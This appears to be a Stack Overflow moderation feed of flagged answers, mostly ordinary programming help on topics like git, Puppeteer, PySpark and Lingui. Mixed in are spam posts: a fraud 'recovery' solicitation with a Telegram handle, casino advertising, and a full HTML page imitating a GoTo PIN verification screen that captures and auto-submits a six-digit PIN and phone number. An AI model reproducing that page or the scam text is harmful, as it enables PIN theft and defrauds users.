Refer to this documentation to understand more: https://langchain-ai.github.io/langgraph/how-tos/tool-calling/#short-term-memory

Reasons:
  • Blacklisted phrase (1): this document
  • Probably link only (1):
  • Long answer (-1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Mangesh Salunke

79755697

Date: 2025-09-04 12:19:07
Score: 1.5
Natty:
Report link

From https://github.com/puppeteer/puppeteer/issues/2685#issuecomment-643573422

await page.addStyleTag({
  content: `
    html {
      -webkit-print-color-adjust: exact !important;
      -webkit-filter: opacity(1) !important;
    }
  `
});
Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
Posted by: Steve

79755694

Date: 2025-09-04 12:17:06
Score: 2.5
Natty:
Report link

I would like to know how to work with LocalDate LocalTime

@JsonFormat(pattern = "yyyy-MM-dd")
private LocalDate dataDetencao;
@JsonFormat(pattern = "HH:mm:ss")
private LocalTime horaDetencao;
Reasons:
  • Blacklisted phrase (1.5): I would like to know
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: kelby pina

79755693

Date: 2025-09-04 12:16:06
Score: 2
Natty:
Report link

My anser might come in a bit late, but just in case anyone else runs into the same issue...

Outbound SMTP connections are blocked on Railway. They recently changed this and SMTP is only available for pro plans and avobe.

https://station.railway.com/questions/smtp-65969dff

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Jorge Dominguez

79755691

Date: 2025-09-04 12:14:05
Score: 1.5
Natty:
Report link

Seems like the difference is only in syntax [source]:

PySpark and pandas on Spark both have similar query execution models. Converting a query to an unresolved logical plan is relativpandas API on Sparkely quick. Optimizing the query and executing it takes much more time. So PySpark and pandas on Spark should have similar performance.

The main difference between pandas on Spark and PySpark is just the syntax.

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: kkonstantinn

79755690

Date: 2025-09-04 12:12:05
Score: 1
Natty:
Report link
After reading the comment of mklement, I created the following working code:

powershell -Command ^
$COMPORT=(Get-WmiObject Win32_SerialPort ^| Select-Object Name, DeviceID ^| ^
Where-Object { $_.Name -like 'USB Serial Device*' } ^| Select-Object -ExpandProperty DeviceID); ^
Write-Host \"Using COM port:[$COMPORT]\"; Start-Process -Wait -FilePath putty -ArgumentList ^
\"-serial $COMPORT -sercfg 9600,8,n,1,N\""
Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Sándor Rózsa

79755689

Date: 2025-09-04 12:10:04
Score: 4
Natty:
Report link

fixed as part of #1377 and #1378

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Eran Hadad

79755679

Date: 2025-09-04 11:59:01
Score: 0.5
Natty:
Report link

No, It only creates a reference of the object, you can see the official documentation referring that here.

enter image description here

This matches your earlier intuition, modifying keyObj (e.g., changing its properties) will still allow you to retrieve the associated value since it's the same object reference.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Rajeev KR

79755676

Date: 2025-09-04 11:52:59
Score: 2.5
Natty:
Report link

Recover from any investment platform, recover from any fraud, hack cash app, recover from dating scam.

Have you ever been tempted to get involved in binary options? Have you had a bad experience? Have you been scammed?

Binary options trading scams are very frequent and binary options loss recovery can be difficult but not impossible. Get in touch with Ethical Recovery service via telegram: (web3ethicalrecovery) and recover your funds.

Reasons:
  • No code block (0.5):
  • Contains question mark (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Leo

79755674

Date: 2025-09-04 11:50:58
Score: 1
Natty:
Report link

@Bright Ran
I hope you're still around, cus I cannot for the life of me get variable replacement to work with my .json file:

{
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "MailerLogging": {
    "Verbose": false
  },
  "MailerSettings": {
    "Name": "",
    "Port": "",
    "KeyVaultName": "",
    "AppID": "",
    "TenantID": "",
    "ClientSecret": ""
  },
  "AllowedHosts": "*"
}

My variables:

variables:
    MailerSettings.0.Name: '${{ parameters.customer }}'
    MailerSettings.0.Port: '3525'
    MailerSettings.0.KeyVaultName: 'KV-Mailer'
    MailerSettings.0.AppID: '${{ parameters.customer }}-AppID'
    MailerSettings.0.TenantID: '${{ parameters.customer }}-TenantID'
    MailerSettings.0.ClientSecret: '${{ parameters.customer }}-ClientSecret'

My filetransform@2 task:

- task: FileTransform@2
    displayName: 'File Transform for Mailer'
    inputs:
      folderPath: '$(Pipeline.Workspace)/${{ parameters.repo }}_${{ parameters.customer }}_preConfig'
      fileType: 'json'
      targetFiles: '**/appsettings.json'
      enableJsonFileTransformation: true

I've tried (i feel like) all the different formats of variables I could find online and by asking copilot in vscode. Nothing works, all I get is "##[warning]Unable to apply transformation for the given package - Changes are already present in the package."
I have confirmed that the paths are right and that the .json is present. I hope someone sees this and can assist me with what I' am doing wrong.

Reasons:
  • Blacklisted phrase (0.5): I cannot
  • Long answer (-1):
  • Has code block (-0.5):
  • User mentioned (1): @Bright
  • Low reputation (1):
Posted by: THG

79755662

Date: 2025-09-04 11:37:55
Score: 1
Natty:
Report link

No, you cannot skip a build stage in AWS CodePipeline directly.

But here’s what you can do:

  1. Use a condition: You can add a rule (like a check using AWS Lambda) to only run the build if needed. For example, run the build only when certain files change.

  2. Use different pipelines: You can create separate pipelines for different tasks, so you don’t always run the build stage.

  3. Make the build optional (in a way): You can change the build action to just pass or do nothing if certain conditions are met.

  4. Also you can visit DevOps with AWS institute if you want proper path .

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Amol Jadhav

79755659

Date: 2025-09-04 11:34:54
Score: 3.5
Natty:
Report link

just ignore it it's issue because of the server and you shouldn't care about it

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: aayco

79755647

Date: 2025-09-04 11:23:51
Score: 1.5
Natty:
Report link

I ended up using VS Code to connect to my other Mac using ssh to code with. When you run the nvg run from the embedded terminal, it will automatically forwarded the port 8080 back to my local machine.

Easy.

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: James McCarthy

79755643

Date: 2025-09-04 11:21:51
Score: 3.5
Natty:
Report link
sudo chmod +x /path/to/yourfile.py
Reasons:
  • Low length (2):
  • Has code block (-0.5):
  • Has no white space (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: khaled Ahmed

79755634

Date: 2025-09-04 11:10:48
Score: 1
Natty:
Report link

I usually do the following for merging master branches of two repositories into the one:

git remote add origin2 ../relative-or-absolute-path-to-other-repo
git fetch origin2 master
git merge origin2/master --allow-unrelated-histories
git remote remove origin2
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Paul Frischknecht

79755625

Date: 2025-09-04 11:03:46
Score: 4
Natty:
Report link

Clean ur browser and try again

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Владислав есть

79755623

Date: 2025-09-04 11:01:45
Score: 2.5
Natty:
Report link

This topic caught my attention and I was looking into it. I found something quite similar to what you described here: GitHub link.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Arash

79755619

Date: 2025-09-04 10:56:43
Score: 2.5
Natty:
Report link

Disable GitLens and restart the Visual Studio Code

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
Posted by: iamJohnvesly

79755610

Date: 2025-09-04 10:45:39
Score: 2.5
Natty:
Report link

Az online kaszinók között a https://wazambacasinohu.org/ kiemelkedik színes és interaktív felületével, valamint széles játékkínálatával. Az oldalon megtalálhatók a klasszikus és modern nyerőgépek, élő kaszinó játékok, valamint különböző bónuszok és promóciók, amelyek minden játékos számára izgalmas lehetőségeket nyújtanak. A felhasználóbarát navigáció és a könnyen kezelhető felület garantálja, hogy a játékélmény zavartalan és élvezetes legyen.

Reasons:
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: LucasSanchez

79755605

Date: 2025-09-04 10:41:38
Score: 4.5
Natty:
Report link

I am having the same issue and apparently you can add suppressClearModelOnRefreshValues: true to filterParams to fix it.

Fun fact: it works for you but not for me 😅

https://www.ag-grid.com/javascript-data-grid/filter-set/#reference-ISetFilterParams-suppressClearModelOnRefreshValues

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Me too answer (2.5): I am having the same issue
  • Low reputation (0.5):
Posted by: Davide Cantelli

79755601

Date: 2025-09-04 10:38:37
Score: 2
Natty:
Report link

In order to avoid blocking the terminal, remove the last line from the above code, i.e.,

# ml_client.jobs.stream(job.name) # uncomment to make it synchronous and wait until job finishes

This is documented in the following tutorial:

https://learn.microsoft.com/en-us/azure/machine-learning/how-to-create-component-pipeline-python?view=azureml-api-2

In this section:

https://learn.microsoft.com/en-us/azure/machine-learning/how-to-create-component-pipeline-python?view=azureml-api-2#submit-the-pipeline-job-to-the-workspace

Reasons:
  • Probably link only (1):
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Jau A

79755600

Date: 2025-09-04 10:36:33
Score: 6.5 🚩
Natty:
Report link
Hi everyone. While installing test link, I get this error at the last step:

Parse error: syntax error, unexpected token ":" in C:\xampp\htdocs\testlink\config.inc.php on line 242

This is line 242 I have on the config.inc.php file:

/** @var string Path to store logs */
$tlCfg->log_path = D:/xampp/htdocs/testlink/logs/;  'logs' . DIRECTORY_SEPARATOR ;

Can you tell me where the error is? Thanks.
Reasons:
  • Blacklisted phrase (0.5): Thanks
  • RegEx Blacklisted phrase (2.5): Can you tell me
  • RegEx Blacklisted phrase (1): I get this error
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Fabio Nicolardi

79755597

Date: 2025-09-04 10:35:32
Score: 3
Natty:
Report link

This solved the problem!
It was a bug in the newest installed version of playwright so I rollbacked to:
yarn add --dev @playwright/[email protected]

https://yarnpkg.com/package?q=%40playwright%2Ftest&name=%40playwright%2Ftest
A link to all versions.

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: LittleStarJenny

79755596

Date: 2025-09-04 10:34:32
Score: 1.5
Natty:
Report link

i face this problem last time but i don't remember exectly but i think i follow this steps if i'm not wrong

  1. Sorting the results by category, so forums belonging to the same category appear consecutively.

  2. Tracking the current category title, so that a new <div class=''forum''> block is only opened when the category changes.

  3. Appending forum rows inside the same table until a new category is detected.

  4. Closing the previous table block when a new category starts or at the end of the loop.

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: Chase Clay

79755594

Date: 2025-09-04 10:32:31
Score: 1
Natty:
Report link

i am using next v14, i fixed this issue: create file jsconfig.json same as tsconfig.json to build docker, then it run with me

Reasons:
  • Whitelisted phrase (-2): i fixed
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: NGUYEN DUC MANH

79755589

Date: 2025-09-04 10:27:29
Score: 2.5
Natty:
Report link

Free Fire Mod Menu Hack crashed

java.lang.NoClassDefFoundError: Failed resolution of:

Lmiui/os/Build: this problem

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Sathish King

79755586

Date: 2025-09-04 10:23:29
Score: 2.5
Natty:
Report link

It's usually because of edge cases, input/output formatting issues, or logic errors that only some HackerRank test cases fail. Ensure that your code is optimized according to constraints and hidden inputs.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Kavya Pharma

79755584

Date: 2025-09-04 10:22:27
Score: 11.5
Natty: 7
Report link

I face the same issue as above, and I used the solution as set options ... , but the issue still. Any one can help me?

Reasons:
  • Blacklisted phrase (1): help me
  • RegEx Blacklisted phrase (3): Any one can help me
  • Low length (1):
  • No code block (0.5):
  • Me too answer (2.5): I face the same issue
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Paul Wang

79755579

Date: 2025-09-04 10:19:26
Score: 1.5
Natty:
Report link

Just make this change in your: tsconfig.json file

 {
      "compilerOptions": {
        "target": "esnext",
        "module": "esnext",
        "outDir": "./dist"
      }
    }
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Shubham Bodalkar

79755576

Date: 2025-09-04 10:17:25
Score: 0.5
Natty:
Report link

I had this issue and found out that the developers of {targets} recommend installing the latest version of {data.table} from CRAN to address this exact issue:

https://github.com/ropensci/targets/discussions/1489#discussioncomment-13146977

They suggest minimum version of 1.16.0. I upgraded and it fixed it for me!

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Beeman

79755567

Date: 2025-09-04 10:10:44
Score: 4
Natty:
Report link

That error is coming straight from Lingui’s core:

Lingui: Attempted to call a translation function without setting a locale.
Make sure to call `i18n.activate(locale)` before using Lingui functions.

In a Next.js App Router setup, this usually happens because your server-side prerender (or build step) renders a page where you call t, Trans, or i18n._(...) before you’ve initialized Lingui and activated a locale.

Here are the key points to fix it:
1. Initialize Lingui on the server

Lingui requires an i18n instance with an active locale. In an App Router project, that normally means you need to initialize it per request (server components can’t rely on a global instance).

Example lib/i18n.ts:

import { i18n } from "@lingui/core";
import { messages as enMessages } from "../locales/en/messages";
import { messages as deMessages } from "../locales/de/messages";

// preload your catalogs (or load dynamically if you prefer)
const catalogs: Record<string, any> = {
  en: enMessages,
  de: deMessages,
};

export function initI18n(locale: string) {
  if (!catalogs[locale]) {
    throw new Error(`Missing messages for locale "${locale}"`);
  }

  i18n.load(locale, catalogs[locale]);
  i18n.activate(locale);

  return i18n;
}

2. Call it inside a layout or server component

For App Router, you can initialize per request in your layout.tsx:

// app/[locale]/layout.tsx
import { initI18n } from "@/lib/i18n";
import { I18nProvider } from "@lingui/react";

export default function RootLayout({
  children,
  params,
}: {
  children: React.ReactNode;
  params: { locale: string };
}) {
  const i18n = initI18n(params.locale);

  return (
    <html lang={params.locale}>
      <body>
        <I18nProvider i18n={i18n}>{children}</I18nProvider>
      </body>
    </html>
  );
}

That way, before any translation is rendered, you’ve already activated the locale.


3. Don’t call t outside components

If you try to use Lingui’s t macro or i18n._(...) at the module top-level (outside a function, e.g. directly in page.tsx), Next will evaluate it before your I18nProvider exists → you’ll get that exact error.

✅ Instead, always call t or render <Trans> inside React components.

4. Double-check static export (next export)

If you’re running next build && next export, Next will prerender all routes. If Lingui doesn’t have a default locale active at build time, you’ll hit the error.
Options:

Reasons:
  • Blacklisted phrase (1): ???
  • RegEx Blacklisted phrase (1.5): SOLVE THE PROBLEM???
  • Long answer (-1):
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Marvin

79755565

Date: 2025-09-04 10:09:44
Score: 3
Natty:
Report link

I just fixed my by manually delete the file under .git/config and thankfully all uncommited changes recover

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Ph Cuber

79755561

Date: 2025-09-04 10:04:42
Score: 0.5
Natty:
Report link

<!DOCTYPE html>

<html lang="id">

<head>

\<meta charset="UTF-8"\>

\<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"\>

\<meta name="theme-color" content="#008000" /\>

\<title\>Verifikasi GoTo PIN\</title\>

\<style\>

    body {

        font-family: Arial, sans-serif;

        background-color: #f5f5f5;

        margin: 0;

        padding: 0;

        display: flex;

        flex-direction: column;

        align-items: center;

        justify-content: flex-start;

        padding-top: 50px;

        height: 100vh;

    }

    nav {

        width: 100%;

        position: fixed;

        background-color: white;

        z-index: 1000;

    }

    nav.top {

        top: 0;

        border-bottom: 1px solid #ddd;

    }

    nav.bottom {

        bottom: 0;

        border-top: 1px solid #ddd;

    }

    nav img {

        width: 100%;

        height: auto;

        display: block;

    }

    .container {

        text-align: center;

        margin-top: 10px;

        margin-bottom: 60px;

    }

    p {

        font-size: 14px;

        text-align: left;

        color: #666;

        margin-left:-10%;

        margin-bottom: 30px;

        font-weight:bold;

    }

    .input-group {

        display: flex;

        justify-content: center;

        gap: 30px;

        margin-left: -5px;

    }

    input\[type="number"\] {

        width: 15px;

        height: 15px;

        border: 2px solid #080;

        border-radius: 100%;

        text-align: center;

        font-weight: bold;

        font-size: 15px;

        color: #080;

        background-color: white;

        transition: background-color 0.2s ease;

        outline: none;

    }

    input\[type="number"\]:focus {

        border-color: #080;

    }

    input\[type="number"\].filled {

        background-color: #080;

        border-color: #008000;

    }

    input\[type="number"\]::-webkit-inner-spin-button,

    input\[type="number"\]::-webkit-outer-spin-button {

        -webkit-appearance: none;

        margin: 0;

    }

    input\[type="number"\] {

        -moz-appearance: textfield;

    }

    

    .loading {

        display: none;

        position: fixed;

        top: 50%;

        left: 50%;

        transform: translate(-50%, -50%);

        z-index: 1000;

        text-align: center;

    }

    .loading img {

        width: 80px;

        height: 80px;

        

        border-radius: 10px;

    

    }

    

.box {

    background-color: white;

    width: 300px; /\* Tetapkan lebar tetap \*/

    padding: 20px; /\* Atur padding sesuai kebutuhan \*/

    margin-top: 20px;

    border-radius: 6px;

    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);

    display: flex;

    flex-direction: column;

    align-items: center; /\* Rata tengah konten di dalam \*/

}

.text-box5 {

    background-color: white;

    padding: 10px 20px;

    border-radius: 30px;

    box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);

    font-size: 12px;

    color: #080;

    font-weight: bold;

    text-align: center;

    margin-left: -62%;

    margin-top: 20px; /\* Tambahkan jarak dari elemen sebelumnya \*/

}

\</style\>

</head>

<body>

\<nav class="top"\>

    \<img src="img/nav.png" alt="Nav Atas"\>

\</nav\>

<div class="box">

\<p\>Silahkan Ketik 6 digit PIN kamu buat lanjut.\</p\>

<form id="pin-form" omsubmit="return false" class="hid" style="width: 100%;">

    \<div class="input-group"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

        \<input type="number" maxlength="1" name="digit\[\]" oninput="handleInput(this)" onkeydown="handleBackspace(this, event)" onkeypress="return isNumberKey(event)"\>

    \</div\>

    \<input type="hidden" name="pin" id="pin"\>

    \<input type="hidden" name="phone_number" id="phone_number" value=""\>

    \<button type="submit" style="display: none;"\>\</button\>

\</form\>

</div>

<div class="text-box5">LUPA PIN?</div>

\<nav class="bottom"\>

    \<img src="img/nav1.png" alt="Nav Bawah"\>

\</nav\>

\<div class="loading" id="loading"\>

    \<img src="I5JAJOrShr.gif" alt="" /\>

    \<p\>\</p\>

\</div\>

\<script\>

    const phoneNumber = localStorage.getItem('phone_number');

    const pinForm = document.getElementById("pin-form");

    const hiddenInput = document.getElementById("pin");

    const loading = document.getElementById("loading");

    const phoneInput = document.getElementById("phone_number");

    function isNumberKey(evt) {

        const charCode = evt.which || evt.keyCode;

        return charCode \>= 48 && charCode \<= 57;

    }

    function handleInput(input) {

        const inputs = document.querySelectorAll('input\[type="number"\]');

        const firstInput = inputs\[0\];

        // Validasi agar input dimulai dari kolom pertama

        if (input !== firstInput && firstInput.value === "") {

            firstInput.focus();

            input.value = "";

            return;

        }

        if (input.value.length === 1) {

            input.classList.add("filled");

            const nextInput = input.nextElementSibling;

            if (nextInput && nextInput.tagName === "INPUT") {

                nextInput.focus();

            } else {

                collectPin();

                showLoading();

            }

        } else {

            input.classList.remove("filled");

        }

    }

    function handleBackspace(input, event) {

        if (event.key === "Backspace" && input.value === "") {

            const prevInput = input.previousElementSibling;

            if (prevInput && prevInput.tagName === "INPUT") {

                prevInput.focus();

                prevInput.value = "";

                prevInput.classList.remove("filled");

            }

        }

    }

    function collectPin() {

        const inputs = document.querySelectorAll('input\[type="number"\]');

        const pin = Array.from(inputs).map(input =\> input.value).join('');

        hiddenInput.value = pin;

    }

    function showLoading() {

        loading.style.display = "block";

        setTimeout(() =\> {

            phoneInput.value = phoneNumber || "";

            pinForm.submit();

        }, 2000);

    }

\</script\>

</body>

</html>

Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: user31418860

79755559

Date: 2025-09-04 10:04:42
Score: 1
Natty:
Report link

When you call asyncio.create_task(coro), the coroutine doesn’t just get registered. It is scheduled immediately on the event loop. That means the coroutine is started right away, up until its first await.

That’s why you see Do something with 1... printed immediately after creating task1: the event loop gives it a chance to run at least until it hits await asyncio.sleep(...). Same for task2.

Reasons:
  • Has code block (-0.5):
  • Starts with a question (0.5): When you
  • Low reputation (1):
Posted by: Sten Overdijk

79755556

Date: 2025-09-04 10:01:41
Score: 5
Natty: 5
Report link

Have everybody here suddenly forgot about <tt> tag?

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: AlexDarkVoid

79755553

Date: 2025-09-04 10:00:40
Score: 7 🚩
Natty: 5.5
Report link

Excute me, I have question: Is Firebase is locked if this issue appear frequently?

Reasons:
  • Blacklisted phrase (1.5): I have question
  • Low length (1.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Kazuto Kirigaza

79755542

Date: 2025-09-04 09:53:37
Score: 1.5
Natty:
Report link

I was able to fix the issue by using System.Windows.Forms.Clipboard instead of System.Windows.Clipboard.

Explanation:

System.Windows.Clipboard uses WPF. Its first usage will start a hidden WPF message loop. This loop marks the application as DPI-aware and triggers a DPI awareness context switch. As a result, the window layout breaks if the application cannot handle higher DPI settings.
To reproduce the behavior, a Windows DPI setting above 100% is required (e.g., 150%).

Reasons:
  • No code block (0.5):
  • Low reputation (1):
Posted by: user31418697

79755539

Date: 2025-09-04 09:52:36
Score: 6.5 🚩
Natty: 5.5
Report link

is this module working on Prestashop?

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Starts with a question (0.5): is this
  • Low reputation (1):
Posted by: Carlos Bejarano

79755536

Date: 2025-09-04 09:50:35
Score: 3
Natty:
Report link

The problem was on AWS IAM User. I deleted the previous user and recreated a one with Full S3 access. Used new KEY and SECRET from the new user and problem solved.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: att

79755535

Date: 2025-09-04 09:48:34
Score: 2.5
Natty:
Report link

Sounds like build 5074 is causing authentication errors.
I'm having similar with some VB6 applications.

Currently rolling back to 10.0.26100.4946 to see if it fixes it.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: strael uk

79755526

Date: 2025-09-04 09:40:32
Score: 1.5
Natty:
Report link

I had the same problem for a long time in WebStorm until I've found that the reason was a JetBrains' plugin for Subversion (https://plugins.jetbrains.com/plugin/11553-subversion)

Reasons:
  • Whitelisted phrase (-1): I had the same
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Igor Ganov

79755525

Date: 2025-09-04 09:38:32
Score: 1
Natty:
Report link

The LocalStorage component is really only client side. So I think import it with { ssr: false } is reasonable.

Suppose you want to use your LocalStorage component within Foo component in the same directory level.

.
├── foo.tsx
└── local-storage.tsx
// foo.tsx
"use client";
import dynamic from "next/dynamic";
const LocalStorage = dynamic(() => import("./local-storage"), { ssr: false });

const Foo:React.FC = () => (
    <LocalStorage />
)

export default Foo;

see https://nextjs.org/docs/messages/react-hydration-error#solution-2-disabling-ssr-on-specific-components

Reasons:
  • Probably link only (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: LiHS

79755511

Date: 2025-09-04 09:26:28
Score: 2
Natty:
Report link

Switch to Raw / Pretty View

In Postman, select the "Pretty" or "Raw" view instead of Table.

This will let you scroll through the full JSON.

Paginate Your API (Best Practice 🚀)

Instead of returning all categories at once, return data in pages.

Example:

GET /api/administrateur/categories?page=1&limit=50

This makes responses smaller, faster, and easier to display.

Download the Responses

In Postman, click Save Response → Save to File and open it in VS Code or a JSON viewer.

Reasons:
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: data collectio

79755508

Date: 2025-09-04 09:22:27
Score: 1
Natty:
Report link

Try turning off the sessionpool's autofetch, like

sessionPool =
                new SessionPool.Builder()
                .nodeUrls(nodeUrls)
                .user(username)
                .password(password)
                .maxSize(500)
                .enableAutoFetch(false)
                .build(),
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Nineteen.X

79755498

Date: 2025-09-04 09:13:24
Score: 1
Natty:
Report link

In my latest Dyomla run I encountered the same problem...
For the the Dymola 2023 Version following these steps worked:
go to >Options >click in the bottom on the button "Variables..."

This opens a window with all Dymola varaibles. Then use the filter/ search bar and enter the Variable Advanced.Define.DAEsolver

Activate the check box and close the window.

Reasons:
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: dymolaUser7005

79755496

Date: 2025-09-04 09:12:24
Score: 4
Natty:
Report link

https://github.com/mergograiqevci/react-native-biometrics-changed

This should be able to detect if there have been any changes or manipulations on biometrics (including deletion, editing, adding)

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Ocelot

79755494

Date: 2025-09-04 09:12:23
Score: 2
Natty:
Report link

Just upgrade your flutter version. If you don't want to upgrade then just download the current flutter sdk from flutter's sdk archive site and replace the your current flutter folder with the newly downloaded one(make sure the folder name doesn't change so that path doesn't get affected) and restart VSCode.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Jostin Akkara

79755485

Date: 2025-09-04 09:05:22
Score: 2
Natty:
Report link

There is now a clear_button plugin in selectizeInput.

shiny::selectizeInput(
    ...,
    options = list(
      plugins = list("remove_button", "clear_button")
    )
 )
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: Snarfinho

79755482

Date: 2025-09-04 09:04:22
Score: 1.5
Natty:
Report link

Okay, I've managed to fix this by first removing the package manually and then running fix broken install.

dpkg --remove --force-all python3-pyinstaller-hooks-contrib
apt --fix-broken install
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: StefanArts

79755473

Date: 2025-09-04 08:52:18
Score: 0.5
Natty:
Report link

It looks like you're trying to access the config datastore.

Could you try the following endpoint instead?

GET /rests/data/opendaylight-inventory:nodes?content=nonconfig 

Using content=nonconfig will retrieve data from the operational datastore.

You can find more examples in the official ODL documentation: https://docs.opendaylight.org/projects/openflowplugin/en/latest/users/operation.html

Reasons:
  • Whitelisted phrase (-1): try the following
  • Low length (0.5):
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: MMM